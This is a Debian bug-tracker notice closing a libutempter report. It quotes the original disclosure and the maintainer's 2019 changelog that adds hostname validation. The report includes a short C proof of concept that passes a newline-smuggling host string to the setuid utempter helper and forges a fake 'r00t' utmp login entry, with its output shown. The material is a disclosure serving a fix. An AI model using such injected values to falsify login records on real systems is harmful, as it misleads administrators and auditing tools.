Your message dated Wed, 02 Oct 2019 17:49:37 +0000 with message-id <[email protected]> and subject line Bug#689562: fixed in libutempter 1.1.6-4 has caused the Debian Bug report #689562, regarding /usr/lib/utempter/utempter: Allows fake host setting to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [email protected] immediately.) -- 689562: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689562 Debian Bug Tracking System Contact [email protected] with problems
--- Begin Message ---Package: libutempter0 Version: 1.1.5-3 Severity: normal File: /usr/lib/utempter/utempter Utempter does not (cannot?) verify the setting of host, so it can easily be faked. This may affect any software that depend on utmp correctness. Demo of the issue: psz@bari:~$ cat silly.c #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> int main() { int i; i = open("/dev/ptmx", O_RDWR); printf("open ptmx returned %d\n", i); dup2(i, 0); /* dup2(i, 1); */ printf("doing utempter add\n"); system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com'"); printf("checking who\n"); system("who | grep xyz"); printf("doing utempter del\n"); system("/usr/lib/utempter/utempter del"); printf("checking who\n"); system("who | grep xyz"); printf("DONE\n"); } psz@bari:~$ cc silly.c; a.out open ptmx returned 3 doing utempter add checking who psz pts/29 Oct 4 11:48 (xyz) r00t pts/0 Jan 1 01:02 (xyz.com) doing utempter del checking who DONE psz@bari:~$ Please see also: http://bugs.debian.org/329156 http://bugs.debian.org/330907 Cheers, Paul Paul Szabo [email protected] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia -- System Information: Debian Release: 6.0.6 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 3.2.19-pk06.01-i386 (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages libutempter0 depends on: ii adduser 3.112+nmu2 add and remove users and groups ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib libutempter0 recommends no packages. libutempter0 suggests no packages. -- no debconf information
--- End Message ---
--- Begin Message ---Source: libutempter Source-Version: 1.1.6-4 We believe that the bug you reported is fixed in the latest version of libutempter, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Christian Göttsche <[email protected]> (supplier of updated libutempter package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Mon, 30 Sep 2019 23:37:44 +0200 Source: libutempter Architecture: source Version: 1.1.6-4 Distribution: unstable Urgency: medium Maintainer: Christian Göttsche <[email protected]> Changed-By: Christian Göttsche <[email protected]> Closes: 689562 879388 Changes: libutempter (1.1.6-4) unstable; urgency=medium . * Set myself as new maintainer (Closes: #879388) * Update vcs fields accordingly * Bump to compat level 12 * Bump to std version 4.4.1 * Enable all hardening options in d/rules * Add autopkg testsuite * Convert d/copyright to machine-readable format * Add standard salsa-ci configuration, exclude reprotest for chown failures * Remove unneeded ignore file for list-missing * Explicit set Build-Depends-Package in d/libutempter0.symbols * Explicit set Rules-Requires-Root to binary-targets * Add C compiler -Wextra flag in d/rules * Patches: - Convert to gbp style - add: Mark old interfaces as deprecated - add: Validate given hostname (Closes: #689562) Checksums-Sha1: 708484b0d532e46861f9b954a331f6c23a4e1cda 2036 libutempter_1.1.6-4.dsc 6612a8b0b27a97e72e60fa5953c5c016d12d3c68 10884 libutempter_1.1.6-4.debian.tar.xz cb52ad5baa5c5df737e5c04021ac92129b1dc2ad 5407 libutempter_1.1.6-4_source.buildinfo Checksums-Sha256: 3512c47b31fdfd8d3d7279ebfbea7074c9d2cb9e576239bc5d42590d20ccc4cb 2036 libutempter_1.1.6-4.dsc 76effc9ccc45409233fc534b83b03ead05da904972c068fe4e704554aad3c4a8 10884 libutempter_1.1.6-4.debian.tar.xz af18c28ae7e7ef0db198345ee31d6757fe262d23db201b16174e914f51288556 5407 libutempter_1.1.6-4_source.buildinfo Files: 25be1d7dd834cd16bc8c4f3c101a3bbf 2036 libs optional libutempter_1.1.6-4.dsc 433e171ea229d19aa95abb9bd095c937 10884 libs optional libutempter_1.1.6-4.debian.tar.xz cbfa3426d7fe5b37ba3ef5691a52bb94 5407 libs optional libutempter_1.1.6-4_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAl2U3fAACgkQweDZLphv fH7FExAAiDUx5HYU9H9yBp8afEQLEE6R45taTLfIs+FtGU61dW0VvIobmgDn65dI RX0nBF+YQ5kOFFKp1wURgklm45t+K916J3xwc6hT4EJuEUEOtAPv65VlPNR1fYYE iXLvCAmsphqP40kfrykzYIPORiPgqlwwXgFGMGuL4hOeCkdrrGZLXdYANLoeX7p0 CDmoLFAKnY4/p8ZHSDQH5vK+MCA/LznJ9Bz039HZ2x/Q+91u+YJ6AC9SF92D4LQV OeWxThKpyk8e4fGEzSlZ/AT1xnBbKMXmg58ZPb+2OYYCcQmVQoXzL+/IdxpfDDTP A5O/iRA0sJF5RjI0HLdHgtZ2O2nRIWJtYrOWbPm83kxmJ6xVQAZNIuCRuR5oAACb JZFmxvuapzz8jZtIY+4A2qCm7EdngPjTMc/lQMFgagBa6AI8Rl62skzHsvVrtD5e 0LPGlO/qmAbN1MLIK3/kerqKdSN0+/Ny7iOtTDB3uj0CTCYc3HDr3tPQGG3evZym NYOZEl17awhsVb28mRnM3rpcRbkNLdIYOjEt0keSQFvPpOUQTMa9hiW/9VEbRPDQ CUXn68eSMZSgugZoNlx1WkHCIktbcet7w6/PVDlLM4kIf0lc+Bn37wlGQaPstcEw 4yiQ3atD8JMxotk+Y0bsG+w2TBtpWnW3Tx6/Ki1RGslHx9kp2Jg= =InJ2 -----END PGP SIGNATURE-----
--- End Message ---
